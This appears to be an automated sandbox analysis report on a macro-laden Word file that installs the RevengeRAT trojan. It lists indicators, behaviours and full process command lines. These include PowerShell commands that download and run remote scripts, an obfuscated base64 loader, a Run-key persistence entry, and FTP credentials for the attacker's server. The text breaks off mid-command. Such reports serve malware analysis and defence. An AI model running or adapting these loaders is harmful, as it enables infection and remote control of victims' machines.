Analysis
max time kernel: 148s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20240730-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240730-en, locale:en-us, os:windows10-2004-x64, system
submitted: 01-08-2024 07:18
Behavioral task behavioral1
  Sample: Flytour.docm
  Resource: win7-20240705-en
Behavioral task behavioral2
  Sample: Flytour.docm
  Resource: win10v2004-20240730-en
General
Target: Flytour.docm
Size: 109KB
MD5: 639df28efc7717655b1d8cc618a76b1c
SHA1: 9e79c9d82ad07f95b09e73bbba792a889911f51e
SHA256: 861375605b6f4b622556d5b04f6329440a26b38dfa066b114c55d258ac4895bc
SHA512: 62fdd2c3b2da4481c4cb380e01a37c67f7005e5024cef3b960883b227b659e056680152d2d72002a1496e293e7f97a47d3a67f8ab890b63209a00f19862a3d6c
SSDEEP: 1536:vkc1B8Tf5nq7gPgP8MDw/jlQx1JE7vReOr0l77CXXNaHsdUXSIt98iuB/xDC:vV2ClwH9r0l77AnsSmy/B/xDC
Malware Config
Extracted
  https://drive.google.com/uc?export=download&id=
Extracted
  Protocol: ftp
  Host: ftp.desckvbrat.com.br
  Port: 21
  Username: desckvbrat1
  Password: developerpro21578Jp@@
Extracted
  revengerat
  NyanCatRevenge
  marcelotatuape.ddns.net:333
  3e042ee793c84
Signatures
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
  description | pid | pid_target | process | target process
  Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | 4196 | 2524 | powershell.exe | WINWORD.EXE
RevengeRAT
Remote-access trojan with a wide range of capabilities.
Blocklisted process makes network request 9 IoCs
Processes:
  flow | pid | process
  44 | 4196 | powershell.exe
  46 | 4196 | powershell.exe
  50 | 4808 | powershell.exe
  52 | 4808 | powershell.exe
  55 | 4808 | powershell.exe
  57 | 4808 | powershell.exe
  59 | 4808 | powershell.exe
  60 | 4808 | powershell.exe
  63 | 4076 | powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-195445723-368091294-1661186673-1000\Control Panel\International\Geo\Nation | WScript.exe
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-195445723-368091294-1661186673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_w = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft SyS\\isltf.ps1' \";exit" | powershell.exe
Processes:
  pid | process
  2688 | powershell.exe
  4076 | powershell.exe
  5052 | powershell.exe
  4808 | powershell.exe
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
Drops file in System32 directory 1 IoCs
Processes:
  description | ioc | process
  File opened for modification | C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
Suspicious use of SetThreadContext 1 IoCs
Processes:
  description | pid | process | target process
  PID 4076 set thread context of 4360 | 4076 | powershell.exe | RegAsm.exe
Command and Scripting Interpreter: JavaScript 1 TTPs
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | RegAsm.exe
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
Modifies registry class 1 IoCs
Processes:
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-195445723-368091294-1661186673-1000_Classes\Local Settings | explorer.exe
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
  pid | process
  2524 | WINWORD.EXE
  2524 | WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
  pid | process
  4196 | powershell.exe
  4196 | powershell.exe
  5052 | powershell.exe
  5052 | powershell.exe
  4808 | powershell.exe
  4808 | powershell.exe
  4808 | powershell.exe
  2688 | powershell.exe
  2688 | powershell.exe
  4076 | powershell.exe
  4076 | powershell.exe
  4076 | powershell.exe
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
  description | pid | process
  Token: SeDebugPrivilege | 4196 | powershell.exe
  Token: SeDebugPrivilege | 5052 | powershell.exe
  Token: SeDebugPrivilege | 4808 | powershell.exe
  Token: SeDebugPrivilege | 2688 | powershell.exe
  Token: SeDebugPrivilege | 4076 | powershell.exe
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
  pid | process
  2524 | WINWORD.EXE
  2524 | WINWORD.EXE
  2524 | WINWORD.EXE
  2524 | WINWORD.EXE
  2524 | WINWORD.EXE
  2524 | WINWORD.EXE
  2524 | WINWORD.EXE
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
  description | pid | process | target process
  PID 2524 wrote to memory of 4196 | 2524 | WINWORD.EXE | powershell.exe
  PID 2524 wrote to memory of 4196 | 2524 | WINWORD.EXE | powershell.exe
  PID 4196 wrote to memory of 3548 | 4196 | powershell.exe | explorer.exe
  PID 4196 wrote to memory of 3548 | 4196 | powershell.exe | explorer.exe
  PID 1764 wrote to memory of 3592 | 1764 | explorer.exe | WScript.exe
  PID 1764 wrote to memory of 3592 | 1764 | explorer.exe | WScript.exe
  PID 3592 wrote to memory of 5052 | 3592 | WScript.exe | powershell.exe
  PID 3592 wrote to memory of 5052 | 3592 | WScript.exe | powershell.exe
  PID 5052 wrote to memory of 4808 | 5052 | powershell.exe | powershell.exe
  PID 5052 wrote to memory of 4808 | 5052 | powershell.exe | powershell.exe
  PID 4808 wrote to memory of 2688 | 4808 | powershell.exe | powershell.exe
  PID 4808 wrote to memory of 2688 | 4808 | powershell.exe | powershell.exe
  PID 4808 wrote to memory of 4076 | 4808 | powershell.exe | powershell.exe
  PID 4808 wrote to memory of 4076 | 4808 | powershell.exe | powershell.exe
  PID 4808 wrote to memory of 2448 | 4808 | powershell.exe | cmd.exe
  PID 4808 wrote to memory of 2448 | 4808 | powershell.exe | cmd.exe
  PID 4076 wrote to memory of 4360 | 4076 | powershell.exe | RegAsm.exe
  PID 4076 wrote to memory of 4360 | 4076 | powershell.exe | RegAsm.exe
  PID 4076 wrote to memory of 4360 | 4076 | powershell.exe | RegAsm.exe
  PID 4076 wrote to memory of 4360 | 4076 | powershell.exe | RegAsm.exe
  PID 4076 wrote to memory of 4360 | 4076 | powershell.exe | RegAsm.exe
  PID 4076 wrote to memory of 4360 | 4076 | powershell.exe | RegAsm.exe
  PID 4076 wrote to memory of 4360 | 4076 | powershell.exe | RegAsm.exe
  PID 4076 wrote to memory of 4360 | 4076 | powershell.exe | RegAsm.exe
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Flytour.docm" /o ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID: 2524
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wget https://www.4sync.com/web/directDownload/rgZiV9iE/8r-wKti0.d13d81b1839707719820361a64160ba8 -o test.js; explorer.exe test.js
    - Process spawned unexpected child process
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 4196
    C:\Windows\explorer.exe
      "C:\Windows\explorer.exe" test.js
      PID: 3548
C:\Windows\explorer.exe
  C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID: 1764
  C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\test.js"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID: 3592
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $vCHvw = 'J⅕BS⅕H⅕⅕RwBK⅕GI⅕I⅕⅕9⅕C⅕⅕J⅕Bo⅕G8⅕cwB0⅕C4⅕VgBl⅕HI⅕cwBp⅕G8⅕bg⅕u⅕E0⅕YQBq⅕G8⅕cg⅕u⅕EU⅕cQB1⅕GE⅕b⅕Bz⅕Cg⅕Mg⅕p⅕Ds⅕SQBm⅕C⅕⅕K⅕⅕k⅕FI⅕c⅕BH⅕Eo⅕Yg⅕p⅕C⅕⅕ew⅕k⅕H⅕⅕YQBz⅕HQ⅕YQ⅕g⅕D0⅕I⅕Bb⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕SQBP⅕C4⅕U⅕Bh⅕HQ⅕a⅕Bd⅕Do⅕OgBH⅕GU⅕d⅕BU⅕GU⅕bQBw⅕F⅕⅕YQB0⅕Gg⅕K⅕⅕p⅕Ds⅕Z⅕Bl⅕Gw⅕I⅕⅕o⅕CQ⅕c⅕Bh⅕HM⅕d⅕Bh⅕C⅕⅕Kw⅕g⅕Cc⅕X⅕BV⅕H⅕⅕dwBp⅕G4⅕LgBt⅕HM⅕dQ⅕n⅕Ck⅕Ow⅕k⅕Gg⅕UwBB⅕Eg⅕c⅕⅕g⅕D0⅕I⅕⅕n⅕Gg⅕d⅕B0⅕H⅕⅕cw⅕6⅕C8⅕LwBk⅕HI⅕aQB2⅕GU⅕LgBn⅕G8⅕bwBn⅕Gw⅕ZQ⅕u⅕GM⅕bwBt⅕C8⅕dQBj⅕D8⅕ZQB4⅕H⅕⅕bwBy⅕HQ⅕PQBk⅕G8⅕dwBu⅕Gw⅕bwBh⅕GQ⅕JgBp⅕GQ⅕PQ⅕n⅕Ds⅕J⅕BI⅕FQ⅕WQBm⅕HY⅕I⅕⅕9⅕C⅕⅕J⅕Bl⅕G4⅕dg⅕6⅕F⅕⅕UgBP⅕EM⅕RQBT⅕FM⅕TwBS⅕F8⅕QQBS⅕EM⅕S⅕BJ⅕FQ⅕RQBD⅕FQ⅕VQBS⅕EU⅕LgBD⅕G8⅕bgB0⅕GE⅕aQBu⅕HM⅕K⅕⅕n⅕DY⅕N⅕⅕n⅕Ck⅕OwBp⅕GY⅕I⅕⅕o⅕CQ⅕S⅕BU⅕Fk⅕ZgB2⅕Ck⅕I⅕B7⅕CQ⅕a⅕BT⅕EE⅕S⅕Bw⅕C⅕⅕PQ⅕g⅕Cg⅕J⅕Bo⅕FM⅕QQBI⅕H⅕⅕I⅕⅕r⅕C⅕⅕JwBX⅕DE⅕MQ⅕y⅕EE⅕Z⅕BQ⅕GY⅕SQ⅕w⅕F⅕⅕Qw⅕3⅕Gg⅕YgBz⅕GM⅕aQBf⅕DU⅕Xw⅕w⅕F8⅕ZQBV⅕Dc⅕TgB3⅕E0⅕WgBo⅕GY⅕N⅕B4⅕Cc⅕KQ⅕g⅕Ds⅕fQBl⅕Gw⅕cwBl⅕C⅕⅕ew⅕k⅕Gg⅕UwBB⅕Eg⅕c⅕⅕g⅕D0⅕I⅕⅕o⅕CQ⅕a⅕BT⅕EE⅕S⅕Bw⅕C⅕⅕Kw⅕g⅕Cc⅕MQBi⅕HI⅕ag⅕1⅕Go⅕cQBu⅕HE⅕UgB4⅕EM⅕R⅕⅕2⅕FY⅕a⅕Bm⅕Gg⅕QQBu⅕DI⅕cgBj⅕FY⅕ZgBz⅕FI⅕bw⅕3⅕EQ⅕O⅕Bn⅕HI⅕Jw⅕p⅕C⅕⅕OwB9⅕Ds⅕J⅕Bm⅕Hc⅕UwBZ⅕H⅕⅕I⅕⅕9⅕C⅕⅕K⅕BO⅕GU⅕dw⅕t⅕E8⅕YgBq⅕GU⅕YwB0⅕C⅕⅕TgBl⅕HQ⅕LgBX⅕GU⅕YgBD⅕Gw⅕aQBl⅕G4⅕d⅕⅕p⅕C⅕⅕Ow⅕k⅕GY⅕dwBT⅕Fk⅕c⅕⅕u⅕EU⅕bgBj⅕G8⅕Z⅕Bp⅕G4⅕Zw⅕g⅕D0⅕I⅕Bb⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕V⅕Bl⅕Hg⅕d⅕⅕u⅕EU⅕bgBj⅕G8⅕Z⅕Bp⅕G4⅕ZwBd⅕Do⅕OgBV⅕FQ⅕Rg⅕4⅕C⅕⅕Ow⅕k⅕GY⅕dwBT⅕Fk⅕c⅕⅕u⅕EQ⅕bwB3⅕G4⅕b⅕Bv⅕GE⅕Z⅕BG⅕Gk⅕b⅕Bl⅕Cg⅕J⅕BV⅕FI⅕T⅕BL⅕EI⅕L⅕⅕g⅕CQ⅕c⅕Bh⅕HM⅕d⅕Bh⅕C⅕⅕Kw⅕g⅕Cc⅕X⅕BV⅕H⅕⅕dwBp⅕G4⅕LgBt⅕HM⅕dQ⅕n⅕Ck⅕I⅕⅕7⅕CQ⅕RgBv⅕Gw⅕Z⅕BT⅕HQ⅕YQBy⅕HQ⅕dQBw⅕C⅕⅕PQ⅕g⅕Cg⅕JwBD⅕Do⅕X⅕BV⅕HM⅕ZQBy⅕HM⅕X⅕⅕n⅕C⅕⅕Kw⅕g⅕Fs⅕RQBu⅕HY⅕aQBy⅕G8⅕bgBt⅕GU⅕bgB0⅕F0⅕Og⅕6⅕FU⅕cwBl⅕HI⅕TgBh⅕G0⅕ZQ⅕g⅕Ck⅕Ow⅕k⅕GY⅕aQBs⅕GU⅕I⅕⅕9⅕C⅕⅕K⅕⅕k⅕H⅕⅕YQBz⅕HQ⅕YQ⅕g⅕Cs⅕I⅕⅕n⅕Fw⅕VQBw⅕Hc⅕aQBu⅕C4⅕bQBz⅕HU⅕Jw⅕p⅕Ds⅕I⅕Bw⅕G8⅕dwBl⅕HI⅕cwBo⅕GU⅕b⅕Bs⅕C4⅕ZQB4⅕GU⅕I⅕B3⅕HU⅕cwBh⅕C4⅕ZQB4⅕GU⅕I⅕⅕k⅕GY⅕aQBs⅕GU⅕I⅕⅕v⅕HE⅕dQBp⅕GU⅕d⅕⅕g⅕C8⅕bgBv⅕HI⅕ZQBz⅕HQ⅕YQBy⅕HQ⅕I⅕⅕7⅕C⅕⅕QwBv⅕H⅕⅕eQ⅕t⅕Ek⅕d⅕Bl⅕G0⅕I⅕⅕n⅕CU⅕R⅕BD⅕F⅕⅕SgBV⅕CU⅕Jw⅕g⅕C0⅕R⅕Bl⅕HM⅕d⅕Bp⅕G4⅕YQB0⅕Gk⅕bwBu⅕C⅕⅕K⅕⅕g⅕CQ⅕RgBv⅕Gw⅕Z⅕BT⅕HQ⅕YQBy⅕HQ⅕dQBw⅕C⅕⅕Kw⅕g⅕Cc⅕X⅕BB⅕H⅕⅕
c⅕BE⅕GE⅕d⅕Bh⅕Fw⅕UgBv⅕GE⅕bQBp⅕G4⅕ZwBc⅕E0⅕aQBj⅕HI⅕bwBz⅕G8⅕ZgB0⅕Fw⅕VwBp⅕G4⅕Z⅕Bv⅕Hc⅕cwBc⅕FM⅕d⅕Bh⅕HI⅕d⅕⅕g⅕E0⅕ZQBu⅕HU⅕X⅕BQ⅕HI⅕bwBn⅕HI⅕YQBt⅕HM⅕X⅕BT⅕HQ⅕YQBy⅕HQ⅕dQBw⅕Cc⅕I⅕⅕p⅕C⅕⅕LQBm⅕G8⅕cgBj⅕GU⅕I⅕⅕7⅕H⅕⅕bwB3⅕GU⅕cgBz⅕Gg⅕ZQBs⅕Gw⅕LgBl⅕Hg⅕ZQ⅕g⅕C0⅕YwBv⅕G0⅕bQBh⅕G4⅕Z⅕⅕g⅕Cc⅕cwBs⅕GU⅕ZQBw⅕C⅕⅕MQ⅕4⅕D⅕⅕Jw⅕7⅕C⅕⅕cwBo⅕HU⅕d⅕Bk⅕G8⅕dwBu⅕C4⅕ZQB4⅕GU⅕I⅕⅕v⅕HI⅕I⅕⅕v⅕HQ⅕I⅕⅕w⅕C⅕⅕LwBm⅕C⅕⅕fQBl⅕Gw⅕cwBl⅕C⅕⅕ewBb⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕TgBl⅕HQ⅕LgBT⅕GU⅕cgB2⅕Gk⅕YwBl⅕F⅕⅕bwBp⅕G4⅕d⅕BN⅕GE⅕bgBh⅕Gc⅕ZQBy⅕F0⅕Og⅕6⅕FM⅕ZQBy⅕HY⅕ZQBy⅕EM⅕ZQBy⅕HQ⅕aQBm⅕Gk⅕YwBh⅕HQ⅕ZQBW⅕GE⅕b⅕Bp⅕GQ⅕YQB0⅕Gk⅕bwBu⅕EM⅕YQBs⅕Gw⅕YgBh⅕GM⅕aw⅕g⅕D0⅕I⅕B7⅕CQ⅕d⅕By⅕HU⅕ZQB9⅕Ds⅕WwBT⅕Hk⅕cwB0⅕GU⅕bQ⅕u⅕E4⅕ZQB0⅕C4⅕UwBl⅕HI⅕dgBp⅕GM⅕ZQBQ⅕G8⅕aQBu⅕HQ⅕TQBh⅕G4⅕YQBn⅕GU⅕cgBd⅕Do⅕OgBT⅕GU⅕YwB1⅕HI⅕aQB0⅕Hk⅕U⅕By⅕G8⅕d⅕Bv⅕GM⅕bwBs⅕C⅕⅕PQ⅕g⅕Fs⅕UwB5⅕HM⅕d⅕Bl⅕G0⅕LgBO⅕GU⅕d⅕⅕u⅕FM⅕ZQBj⅕HU⅕cgBp⅕HQ⅕eQBQ⅕HI⅕bwB0⅕G8⅕YwBv⅕Gw⅕V⅕B5⅕H⅕⅕ZQBd⅕Do⅕OgBU⅕Gw⅕cw⅕x⅕DI⅕Ow⅕k⅕Hc⅕VgBQ⅕Gw⅕dQ⅕g⅕D0⅕I⅕⅕o⅕E4⅕ZQB3⅕C0⅕TwBi⅕Go⅕ZQBj⅕HQ⅕I⅕BO⅕GU⅕d⅕⅕u⅕Fc⅕ZQBi⅕EM⅕b⅕Bp⅕GU⅕bgB0⅕Ck⅕Ow⅕k⅕Hc⅕VgBQ⅕Gw⅕dQ⅕u⅕EU⅕bgBj⅕G8⅕Z⅕Bp⅕G4⅕Zw⅕g⅕D0⅕I⅕Bb⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕V⅕Bl⅕Hg⅕d⅕⅕u⅕EU⅕bgBj⅕G8⅕Z⅕Bp⅕G4⅕ZwBd⅕Do⅕OgBV⅕FQ⅕Rg⅕4⅕Ds⅕J⅕B3⅕FY⅕U⅕Bs⅕HU⅕LgBD⅕HI⅕ZQBk⅕GU⅕bgB0⅕Gk⅕YQBs⅕HM⅕I⅕⅕9⅕C⅕⅕bgBl⅕Hc⅕LQBv⅕GI⅕agBl⅕GM⅕d⅕⅕g⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕TgBl⅕HQ⅕LgBO⅕GU⅕d⅕B3⅕G8⅕cgBr⅕EM⅕cgBl⅕GQ⅕ZQBu⅕HQ⅕aQBh⅕Gw⅕K⅕⅕n⅕GQ⅕ZQBz⅕GM⅕awB2⅕GI⅕cgBh⅕HQ⅕MQ⅕n⅕Cw⅕JwBk⅕GU⅕dgBl⅕Gw⅕bwBw⅕GU⅕cgBw⅕HI⅕bw⅕y⅕DE⅕NQ⅕3⅕Dg⅕SgBw⅕E⅕⅕Q⅕⅕n⅕Ck⅕Ow⅕k⅕E0⅕VwBm⅕HU⅕YQ⅕g⅕D0⅕I⅕⅕k⅕Hc⅕VgBQ⅕Gw⅕dQ⅕u⅕EQ⅕bwB3⅕G4⅕b⅕Bv⅕GE⅕Z⅕BT⅕HQ⅕cgBp⅕G4⅕Zw⅕o⅕C⅕⅕JwBm⅕HQ⅕c⅕⅕6⅕C8⅕LwBk⅕GU⅕cwBj⅕Gs⅕dgBi⅕HI⅕YQB0⅕DE⅕Q⅕Bm⅕HQ⅕c⅕⅕u⅕GQ⅕ZQBz⅕GM⅕awB2⅕GI⅕cgBh⅕HQ⅕LgBj⅕G8⅕bQ⅕u⅕GI⅕cg⅕v⅕FU⅕c⅕Bj⅕HI⅕eQBw⅕HQ⅕ZQBy⅕C8⅕M⅕⅕y⅕C8⅕R⅕BM⅕Ew⅕M⅕⅕x⅕C4⅕d⅕B4⅕HQ⅕Jw⅕g⅕Ck⅕Ow⅕k⅕Hc⅕VgBQ⅕Gw⅕dQ⅕u⅕GQ⅕aQBz⅕H⅕⅕bwBz⅕GU⅕K⅕⅕p⅕Ds⅕J⅕B3⅕FY⅕U⅕Bs⅕HU⅕I⅕⅕9⅕C⅕⅕K⅕BO⅕GU⅕dw⅕t⅕E8⅕YgBq⅕GU⅕YwB0⅕C⅕⅕TgBl⅕HQ⅕LgBX⅕GU⅕YgBD⅕Gw⅕aQBl⅕G4⅕d⅕⅕p⅕Ds⅕J⅕B3⅕FY⅕U⅕Bs⅕HU⅕LgBF⅕G4⅕YwBv⅕GQ⅕aQBu⅕Gc⅕I⅕⅕9⅕C⅕⅕WwBT⅕Hk⅕cwB0⅕GU⅕bQ⅕u⅕FQ⅕ZQB4⅕HQ⅕LgBF⅕G4⅕YwBv⅕GQ⅕aQBu⅕Gc⅕XQ⅕6⅕Do⅕VQBU⅕EY⅕O⅕⅕7⅕CQ⅕TQBX⅕GY⅕dQBh⅕C⅕⅕PQ⅕g⅕CQ⅕dwBW⅕F⅕⅕b⅕B1⅕C4⅕R⅕Bv⅕Hc⅕bgBs⅕G8⅕YQBk⅕FM⅕d⅕By⅕Gk⅕bgBn⅕Cg⅕I⅕⅕k⅕E0⅕VwBm⅕HU⅕YQ⅕g⅕Ck⅕OwBb⅕EI⅕eQB0⅕GU⅕WwBd⅕F0⅕I⅕⅕k⅕FI⅕W⅕Bp⅕FY⅕
agBf⅕Fk⅕b⅕B0⅕Eg⅕Sw⅕g⅕D0⅕I⅕Bb⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕QwBv⅕G4⅕dgBl⅕HI⅕d⅕Bd⅕Do⅕OgBG⅕HI⅕bwBt⅕EI⅕YQBz⅕GU⅕Ng⅕0⅕FM⅕d⅕By⅕Gk⅕bgBn⅕Cg⅕I⅕⅕k⅕E0⅕VwBm⅕HU⅕YQ⅕u⅕FI⅕ZQBw⅕Gw⅕YQBj⅕GU⅕K⅕⅕g⅕Cc⅕kyE6⅕JMhJw⅕g⅕Cw⅕I⅕⅕n⅕EE⅕Jw⅕g⅕Ck⅕I⅕⅕p⅕Ds⅕WwBT⅕Hk⅕cwB0⅕GU⅕bQ⅕u⅕EE⅕c⅕Bw⅕EQ⅕bwBt⅕GE⅕aQBu⅕F0⅕Og⅕6⅕EM⅕dQBy⅕HI⅕ZQBu⅕HQ⅕R⅕Bv⅕G0⅕YQBp⅕G4⅕LgBM⅕G8⅕YQBk⅕Cg⅕I⅕⅕k⅕FI⅕W⅕Bp⅕FY⅕agBf⅕Fk⅕b⅕B0⅕Eg⅕Sw⅕g⅕Ck⅕LgBH⅕GU⅕d⅕BU⅕Hk⅕c⅕Bl⅕Cg⅕I⅕⅕n⅕EM⅕b⅕Bh⅕HM⅕cwBM⅕Gk⅕YgBy⅕GE⅕cgB5⅕DM⅕LgBD⅕Gw⅕YQBz⅕HM⅕MQ⅕n⅕C⅕⅕KQ⅕u⅕Ec⅕ZQB0⅕E0⅕ZQB0⅕Gg⅕bwBk⅕Cg⅕I⅕⅕n⅕H⅕⅕cgBG⅕FY⅕SQ⅕n⅕C⅕⅕KQ⅕u⅕Ek⅕bgB2⅕G8⅕awBl⅕Cg⅕J⅕Bu⅕HU⅕b⅕Bs⅕Cw⅕I⅕Bb⅕G8⅕YgBq⅕GU⅕YwB0⅕Fs⅕XQBd⅕C⅕⅕K⅕⅕g⅕Cc⅕Mg⅕y⅕CU⅕OQ⅕3⅕D⅕⅕MwBj⅕GY⅕N⅕⅕0⅕GI⅕Z⅕⅕z⅕DU⅕YQ⅕1⅕GM⅕N⅕⅕3⅕DQ⅕Ng⅕y⅕GI⅕NwBi⅕GU⅕O⅕⅕y⅕Dk⅕O⅕⅕x⅕DI⅕Zg⅕2⅕DI⅕Mg⅕l⅕D0⅕dg⅕m⅕GQ⅕YQBv⅕Gw⅕bgB3⅕G8⅕Z⅕⅕9⅕GU⅕YwBy⅕HU⅕bwBz⅕CY⅕d⅕B4⅕HQ⅕Lg⅕0⅕DI⅕M⅕⅕y⅕C4⅕Nw⅕w⅕C4⅕M⅕⅕z⅕Dc⅕Mg⅕l⅕Dc⅕Mg⅕l⅕Dg⅕LQBG⅕FQ⅕VQBE⅕DM⅕JQBB⅕DI⅕JQBl⅕G0⅕YQBu⅕GU⅕b⅕Bp⅕GY⅕KwBC⅕DM⅕JQ⅕y⅕DI⅕JQB0⅕Hg⅕d⅕⅕u⅕DQ⅕Mg⅕w⅕DI⅕Lg⅕3⅕D⅕⅕Lg⅕w⅕DM⅕Mg⅕y⅕CU⅕R⅕⅕z⅕CU⅕ZQBt⅕GE⅕bgBl⅕Gw⅕aQBm⅕Cs⅕Qg⅕z⅕CU⅕d⅕Bu⅕GU⅕bQBo⅕GM⅕YQB0⅕HQ⅕YQ⅕9⅕G4⅕bwBp⅕HQ⅕aQBz⅕G8⅕c⅕Bz⅕Gk⅕Z⅕⅕t⅕HQ⅕bgBl⅕HQ⅕bgBv⅕GM⅕LQBl⅕HM⅕bgBv⅕H⅕⅕cwBl⅕HI⅕PwB0⅕Hg⅕d⅕⅕u⅕GU⅕N⅕⅕1⅕DM⅕N⅕⅕y⅕DQ⅕Mg⅕3⅕Dk⅕O⅕⅕1⅕C0⅕NQBl⅕Dc⅕OQ⅕t⅕GY⅕Yw⅕2⅕DQ⅕LQ⅕0⅕DU⅕N⅕⅕4⅕C0⅕M⅕⅕5⅕Dc⅕ZgBh⅕D⅕⅕NQ⅕1⅕C8⅕bwBR⅕E8⅕MgBM⅕HU⅕M⅕Bv⅕C8⅕cwBt⅕GU⅕d⅕Bp⅕C8⅕bQBv⅕GM⅕LgB0⅕Gg⅕ZwBp⅕Ho⅕LgBu⅕GQ⅕Yw⅕u⅕D⅕⅕bg⅕u⅕DE⅕cgB0⅕C4⅕NwBw⅕C8⅕Lw⅕6⅕HM⅕c⅕B0⅕HQ⅕a⅕⅕n⅕C⅕⅕L⅕⅕g⅕Cc⅕JQBE⅕EM⅕U⅕BK⅕FU⅕JQ⅕n⅕Cw⅕I⅕⅕n⅕FQ⅕cgB1⅕GU⅕MQ⅕n⅕C⅕⅕KQ⅕g⅕Ck⅕OwB9⅕Ds⅕';$vCHvw = $vCHvw.replace('⅕','A') ;$vCHvw = [System.Convert]::FromBase64String( $vCHvw ) ;;;$vCHvw = [System.Text.Encoding]::Unicode.GetString( $vCHvw ) ;$vCHvw = $vCHvw.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\test.js') ;powershell $vCHvw3⤵
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 5052
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$RpGJb = $host.Version.Major.Equals(2);If ($RpGJb) {$pasta = [System.IO.Path]::GetTempPath();del ($pasta + '\Upwin.msu');$hSAHp = 'https://drive.google.com/uc?export=download&id=';$HTYfv = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ($HTYfv) {$hSAHp = ($hSAHp + 'W112AdPfI0PC7hbsci_5_0_eU7NwMZhf4x') ;}else {$hSAHp = ($hSAHp + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr') ;};$fwSYp = (New-Object Net.WebClient) ;$fwSYp.Encoding = [System.Text.Encoding]::UTF8 ;$fwSYp.DownloadFile($URLKB, $pasta + '\Upwin.msu') ;$FoldStartup = ('C:\Users\' + [Environment]::UserName );$file = ($pasta + '\Upwin.msu'); powershell.exe wusa.exe $file /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\test.js' -Destination ( $FoldStartup + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$wVPlu = (New-Object Net.WebClient);$wVPlu.Encoding = [System.Text.Encoding]::UTF8;$wVPlu.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$MWfua = $wVPlu.DownloadString( 'ftp://[email 